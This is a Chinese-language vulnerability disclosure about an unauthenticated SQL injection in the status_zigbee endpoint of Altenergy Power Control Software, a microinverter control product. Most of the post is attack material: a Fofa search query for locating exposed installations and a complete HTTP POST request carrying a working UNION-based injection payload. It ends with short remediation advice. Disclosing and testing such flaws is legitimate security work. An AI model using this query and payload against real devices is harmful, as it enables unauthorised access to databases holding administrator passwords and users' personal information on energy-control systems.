0x01 产品描述：

              Altenergy‌是一家专注于微型逆变器控制软件的公司，Altenergy电力系统控制软件是Altenergy电力系统公司的一款微型逆变器控制软件。

0x02 漏洞描述：

             Altenergy电力系统 status_zigbee接口处存在SQL注入漏洞，未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)。

 

0x03 搜索语句：

Fofa：title="Altenergy Power Control Software"

0x04 漏洞复现：

POST /index.php/display/status_zigbee HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: closedate=2024-11-06%' UNION ALL SELECT 11,CHAR(112)||CHAR(77,121,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,119,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,112),12-- eKdp

0x05 修复建议：

        建议对所有输入数据进行严格验证，并使用参数化查询。同时，应限制数据库用户的权限，仅授予执行必要操作所需的最低权限。定期进行安全审计，以发现并修复潜在的安全漏洞。